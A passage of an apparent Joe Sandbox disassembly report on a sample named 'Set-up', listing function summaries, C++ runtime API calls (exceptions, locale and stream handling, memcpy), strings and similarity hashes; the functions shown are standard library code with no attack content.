                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@ExceptionH_prolog3_Throw
                                                                                              • String ID: _PSource
                                                                                              • API String ID: 1533905105-588581970
                                                                                              • Opcode ID: b46098e8aca2a42ab7a74861bc1d811234dad00292875e144809cfb108a3ec48
                                                                                              • Instruction ID: b8140f762042515d9103e579565469aee0a4b4ff4da7555ff6d1e9632ec65eac
                                                                                              • Opcode Fuzzy Hash: b46098e8aca2a42ab7a74861bc1d811234dad00292875e144809cfb108a3ec48
                                                                                              • Instruction Fuzzy Hash: 9C11C675911219EBCB00DFA8C985BDDFBB4BF48354F508116E524B7250E738AB45DFA0
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(00000000), ref: 6BC1AC3E
                                                                                              • _CxxThrowException.MSVCR100(00000000,6BC4C928), ref: 6BC1AC54
                                                                                              • ??0bad_target@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC1AC6B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Similarity
                                                                                              • API ID: ??0bad_target@??0exception@std@@Concurrency@@ExceptionThrow
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 3229365802-988830941
                                                                                              • Opcode ID: 5cf8e969528eab1b1ce2d8ef03633a1b68e4ddef2920f2755366330741814e99
                                                                                              • Instruction ID: 1763d7ad93b51c200373dcb28002507753bb86057ef8610323f2f87180d8001d
                                                                                              • Opcode Fuzzy Hash: 5cf8e969528eab1b1ce2d8ef03633a1b68e4ddef2920f2755366330741814e99
                                                                                              • Instruction Fuzzy Hash: 44014635914108EBCF00DF94C448ACDBBB8FF55324B00809AF962A6220EB399708DF50
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(6BC123E8), ref: 6BC1AFFE
                                                                                              • _CxxThrowException.MSVCR100(00000000,6BC4C848), ref: 6BC1B014
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@ExceptionThrow
                                                                                              • String ID: _PMessage$_PSource
                                                                                              • API String ID: 2684170311-3961265847
                                                                                              • Opcode ID: 9133d0369f47e7fa5f9571c95af4bda39df364e13c71545781c0e689c72a6b3a
                                                                                              • Instruction ID: 39d9712a8e593869abed851a0ba1ce999aa1703059b37b6c3a701d946e4ee709
                                                                                              • Opcode Fuzzy Hash: 9133d0369f47e7fa5f9571c95af4bda39df364e13c71545781c0e689c72a6b3a
                                                                                              • Instruction Fuzzy Hash: 1DF0307582820CAACB00DF95D4457CD7B78EB51345F40C166A515EA100F77C8388DF91
                                                                                              APIs
                                                                                              • _Getmonths.MSVCR100 ref: 6BC1B915
                                                                                              • ??4?$_Yarn@D@std@@QAEAAV01@PBD@Z.MSVCP100(00000000), ref: 6BC1B925
                                                                                                • Part of subcall function 6BC1D90B: free.MSVCR100 ref: 6BC1D922
                                                                                                • Part of subcall function 6BC1D90B: malloc.MSVCR100 ref: 6BC1D944
                                                                                                • Part of subcall function 6BC1D90B: memcpy.MSVCR100(00000000,?,?,6BC3B700,00000000,?,6BC1B6E1,?,?,00000000,00000010), ref: 6BC1D954
                                                                                              • free.MSVCR100 ref: 6BC1B92B
                                                                                              Strings
                                                                                              • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 6BC1B93B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Similarity
                                                                                              • API ID: free$??4?$_D@std@@GetmonthsV01@Yarn@mallocmemcpy
                                                                                              • String ID: :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December
                                                                                              • API String ID: 865066547-4232081075
                                                                                              • Opcode ID: 2d16e5a849508403f1f8f206f6e225e520bf0c8ecaa0d3d0a1be68674fb38ef3
                                                                                              • Instruction ID: 299608cc9c2831f7b1d1a2661aa6d477d860225c66c5672e7428e121af8ebbea
                                                                                              • Opcode Fuzzy Hash: 2d16e5a849508403f1f8f206f6e225e520bf0c8ecaa0d3d0a1be68674fb38ef3
                                                                                              • Instruction Fuzzy Hash: ACE0C2375095204743225A2EA40485B6774DEC6A713064459F825F7300EF28DE0395A0
                                                                                              APIs
                                                                                              • _Getdays.MSVCR100 ref: 6BC1B8DC
                                                                                              • ??4?$_Yarn@D@std@@QAEAAV01@PBD@Z.MSVCP100(00000000), ref: 6BC1B8EC
                                                                                                • Part of subcall function 6BC1D90B: free.MSVCR100 ref: 6BC1D922
                                                                                                • Part of subcall function 6BC1D90B: malloc.MSVCR100 ref: 6BC1D944
                                                                                                • Part of subcall function 6BC1D90B: memcpy.MSVCR100(00000000,?,?,6BC3B700,00000000,?,6BC1B6E1,?,?,00000000,00000010), ref: 6BC1D954
                                                                                              • free.MSVCR100 ref: 6BC1B8F2
                                                                                              Strings
                                                                                              • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 6BC1B902
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Similarity
                                                                                              • API ID: free$??4?$_D@std@@GetdaysV01@Yarn@mallocmemcpy
                                                                                              • String ID: :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                              • API String ID: 678222246-3283725177
                                                                                              • Opcode ID: 5e8b11dfb71008d98033e2cd8a4f24234a9d4a643f70775438f17fce75b3ac42
                                                                                              • Instruction ID: 899287900f55d559bf1945b64ce456c2335906ac620656debf370aeb2b9fe74b
                                                                                              • Opcode Fuzzy Hash: 5e8b11dfb71008d98033e2cd8a4f24234a9d4a643f70775438f17fce75b3ac42
                                                                                              • Instruction Fuzzy Hash: 2AE0C23B5195204347224A1EA51885B6B78AAC6E71312005DF865F7300EF2CDE0395A0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1821D
                                                                                              • ??0invalid_operation@Concurrency@@QAE@PBD@Z.MSVCR100(Deleting link registry before removing all the links,00000010,6BC1901B,00000000,6BC184D0,00000001,00000004,6BC183CE), ref: 6BC18242
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C880), ref: 6BC18251
                                                                                              Strings
                                                                                              • Deleting link registry before removing all the links, xrefs: 6BC1823A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Similarity
                                                                                              • API ID: ??0invalid_operation@Concurrency@@ExceptionH_prolog3Throw
                                                                                              • String ID: Deleting link registry before removing all the links
                                                                                              • API String ID: 1654019315-1123019286
                                                                                              • Opcode ID: 42d820a62bb1343f51d5c0f6f3456dfc09e7ff07ee9f67e12c701d7837d6d6c0
                                                                                              • Instruction ID: b7acae908fbc95cfffebba9a4cd59dc86e3f23a10b471d8f69bcc18b3f884d03
                                                                                              • Opcode Fuzzy Hash: 42d820a62bb1343f51d5c0f6f3456dfc09e7ff07ee9f67e12c701d7837d6d6c0
                                                                                              • Instruction Fuzzy Hash: FFE0DFB5C3810887DB249FF08822BADB6786F91305F800876E554B6180FBBC8700A7B0
                                                                                              APIs
                                                                                              • memcpy.MSVCR100(?,?,0000000C), ref: 6BC1F981
                                                                                              • memcpy.MSVCR100(?,?,0000000C), ref: 6BC1F994
                                                                                              • memcpy.MSVCR100(?,?,0000000C), ref: 6BC1F9A0
                                                                                              • memcpy.MSVCR100(?,?,0000000C), ref: 6BC1F9A8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID:
                                                                                              • API String ID: 3510742995-0
                                                                                              • Opcode ID: 35f2bf4aec2fc073a671c564ee71c53efc0361904fdd81e06a92914df46b17c6
                                                                                              • Instruction ID: d33e02fe429f99852ba51a97f9ed323c8ce66bdcaffe6822251c88871c9fb99d
                                                                                              • Opcode Fuzzy Hash: 35f2bf4aec2fc073a671c564ee71c53efc0361904fdd81e06a92914df46b17c6
                                                                                              • Instruction Fuzzy Hash: A6316DB5A14706AFC710DF69C98195AB7F8BF19304B10062AE855E3600E734FA48CBE1
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BC21A97
                                                                                              • fgetc.MSVCR100 ref: 6BC21BAE
                                                                                                • Part of subcall function 6BC21926: ?_Xlength_error@std@@YAXPBD@Z.MSVCP100(string too long), ref: 6BC21943
                                                                                              • memcpy_s.MSVCR100 ref: 6BC21B7D
                                                                                              • ungetc.MSVCR100 ref: 6BC21BF2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_Xlength_error@std@@fgetcmemcpy_sungetc
                                                                                              • String ID:
                                                                                              • API String ID: 3822885246-0
                                                                                              • Opcode ID: 0d14e3dfd7372cb197534cd167508065344d8556ea9b51647d6fce21add508bf
                                                                                              • Instruction ID: 1be3a9270a04a67323e5e2bcbd5979fea1d0349f81b47f8959d592e25d8f19f0
                                                                                              • Opcode Fuzzy Hash: 0d14e3dfd7372cb197534cd167508065344d8556ea9b51647d6fce21add508bf
                                                                                              • Instruction Fuzzy Hash: D25161B9D24629DFDB14CFBCC4818DEB7B4FF09714B50456AE552A3240F73AAA44CB60
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC23E8A
                                                                                              • ?getloc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000014), ref: 6BC23F60
                                                                                                • Part of subcall function 6BC22533: std::locale::facet::_Incref.LIBCPMT ref: 6BC22548
                                                                                              • ?pubimbue@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAE?AVlocale@2@ABV32@@Z.MSVCP100(?,00000000,00000014), ref: 6BC23F70
                                                                                                • Part of subcall function 6BC22591: __EH_prolog3.LIBCMT ref: 6BC22598
                                                                                                • Part of subcall function 6BC22591: std::locale::facet::_Incref.LIBCPMT(?,?,?,?,00000004), ref: 6BC225B1
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?pubimbue@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAE?AVlocale@2@ABV32@@Z.MSVCP100(?,?,00000014), ref: 6BC23F8B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_Vlocale@2@W@std@@@std@@std::locale::facet::_$?pubimbue@?$basic_streambuf@_H_prolog3IncrefV32@@$?getloc@?$basic_streambuf@_Decref
                                                                                              • String ID:
                                                                                              • API String ID: 2308012705-0
                                                                                              • Opcode ID: c1ee09297c53788356e41cd59de49c6c4056345add846550a4cccf90095fda0c
                                                                                              • Instruction ID: 7bc4b91e20b94676c70157a5f7e8bb68aa916be76d1ae1c9e0064e195d4a1a26
                                                                                              • Opcode Fuzzy Hash: c1ee09297c53788356e41cd59de49c6c4056345add846550a4cccf90095fda0c
                                                                                              • Instruction Fuzzy Hash: C241C3B8A10A05DFCB19CF68C5D09AAB7F1BF8D300B50415DDA469BB64DB34BA11CFA0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC23BB1
                                                                                              • ?getloc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000014), ref: 6BC23C7B
                                                                                                • Part of subcall function 6BC22533: std::locale::facet::_Incref.LIBCPMT ref: 6BC22548
                                                                                              • ?pubimbue@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAE?AVlocale@2@ABV32@@Z.MSVCP100(?,00000000,00000014), ref: 6BC23C8B
                                                                                                • Part of subcall function 6BC22591: __EH_prolog3.LIBCMT ref: 6BC22598
                                                                                                • Part of subcall function 6BC22591: std::locale::facet::_Incref.LIBCPMT(?,?,?,?,00000004), ref: 6BC225B1
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?pubimbue@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAE?AVlocale@2@ABV32@@Z.MSVCP100(?,?,00000014), ref: 6BC23CA6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_Vlocale@2@W@std@@@std@@std::locale::facet::_$?pubimbue@?$basic_streambuf@_H_prolog3IncrefV32@@$?getloc@?$basic_streambuf@_Decref
                                                                                              • String ID:
                                                                                              • API String ID: 2308012705-0
                                                                                              • Opcode ID: 4283f60eae7fb4e9f25b1c0a50c46a092082302c036f300224ca50232ae6a636
                                                                                              • Instruction ID: 1e41dab3bdcb15dc6f2737d5215d22e7961e0d180ceb56303ba9ae8fb05fa438
                                                                                              • Opcode Fuzzy Hash: 4283f60eae7fb4e9f25b1c0a50c46a092082302c036f300224ca50232ae6a636
                                                                                              • Instruction Fuzzy Hash: 1B41C7B8611A05DFCB18CF68C5909AAB7F2FF8D300B50456CD94A9BB50DB30BA41CF90
                                                                                              APIs
                                                                                              • ___mb_cur_max_func.MSVCR100 ref: 6BC1C099
                                                                                              • _Wcrtomb.MSVCP100(?,?,?,?), ref: 6BC1C0BA
                                                                                                • Part of subcall function 6BC3ACBD: ___lc_handle_func.MSVCR100 ref: 6BC3ACCB
                                                                                                • Part of subcall function 6BC3ACBD: ___lc_codepage_func.MSVCR100 ref: 6BC3ACD4
                                                                                              • _Wcrtomb.MSVCP100(?,?,?,?), ref: 6BC1C0E4
                                                                                              • memcpy.MSVCR100(00000000,?,00000000), ref: 6BC1C103
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Wcrtomb$___lc_codepage_func___lc_handle_func___mb_cur_max_funcmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 1260106109-0
                                                                                              • Opcode ID: 79b55fd1265ac4b43e0154efa6888a612ad3620653475ca3cbb7c18b029de3d9
                                                                                              • Instruction ID: 262b4ff969b8de71b6d516a5cfd67d1b0969d4c5715aa40a5003f2b6bf46da9e
                                                                                              • Opcode Fuzzy Hash: 79b55fd1265ac4b43e0154efa6888a612ad3620653475ca3cbb7c18b029de3d9
                                                                                              • Instruction Fuzzy Hash: A031F6B5A5420ADFCB04DFA8C8819AEB7F8FF58315B604469F955E7240E738AA50CB60
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2CAD7
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,0000002C), ref: 6BC2CAF6
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,0000002C), ref: 6BC2CB1B
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26234: __EH_prolog3.LIBCMT ref: 6BC2623B
                                                                                                • Part of subcall function 6BC26234: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC26245
                                                                                                • Part of subcall function 6BC26234: int.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC2625C
                                                                                                • Part of subcall function 6BC26234: std::locale::_Getfacet.LIBCPMT ref: 6BC26265
                                                                                                • Part of subcall function 6BC26234: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC262C5
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,0000002C), ref: 6BC2CBD4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@_LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 565754905-0
                                                                                              • Opcode ID: 004ea28c141477fcfde73173c3dc36e265bd37fe1bab5ecccbee9cc5beb8b840
                                                                                              • Instruction ID: 3d1707ceb82928b5091969a396580090ccdd9ec2b0eb34fc980882b630e1791c
                                                                                              • Opcode Fuzzy Hash: 004ea28c141477fcfde73173c3dc36e265bd37fe1bab5ecccbee9cc5beb8b840
                                                                                              • Instruction Fuzzy Hash: 7C31BC75A15208DFCB04CFE8C984BEEBBB5BF18304F244099E046B7281E7388B44CB60
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2CD10
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,0000002C), ref: 6BC2CD2F
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,0000002C), ref: 6BC2CD54
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26234: __EH_prolog3.LIBCMT ref: 6BC2623B
                                                                                                • Part of subcall function 6BC26234: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC26245
                                                                                                • Part of subcall function 6BC26234: int.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC2625C
                                                                                                • Part of subcall function 6BC26234: std::locale::_Getfacet.LIBCPMT ref: 6BC26265
                                                                                                • Part of subcall function 6BC26234: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC262C5
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,0000002C), ref: 6BC2CE09
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@_LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 565754905-0
                                                                                              • Opcode ID: 87d71582e18d8bc20d8952b208a335a96e786fc95fb3d84ea1c6949f0f5c934d
                                                                                              • Instruction ID: 18d6d500ae127c87af06e580a0a54c2332068c4ea77e5c71895feb8c22a142dc
                                                                                              • Opcode Fuzzy Hash: 87d71582e18d8bc20d8952b208a335a96e786fc95fb3d84ea1c6949f0f5c934d
                                                                                              • Instruction Fuzzy Hash: 2B318771A152089FCB04CFE8C990BEEBBB5BF18318F244099E146B7291E7389B05CB61
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2E38C
                                                                                              • ?_Ipfx@?$basic_istream@GU?$char_traits@G@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,0000002C), ref: 6BC2E3AB
                                                                                                • Part of subcall function 6BC1E00D: __EH_prolog3_catch.LIBCMT ref: 6BC1E014
                                                                                                • Part of subcall function 6BC1E00D: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1E00D: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                                • Part of subcall function 6BC1E00D: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                                • Part of subcall function 6BC1E00D: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,0000002C), ref: 6BC2E3D0
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC262D7: __EH_prolog3.LIBCMT ref: 6BC262DE
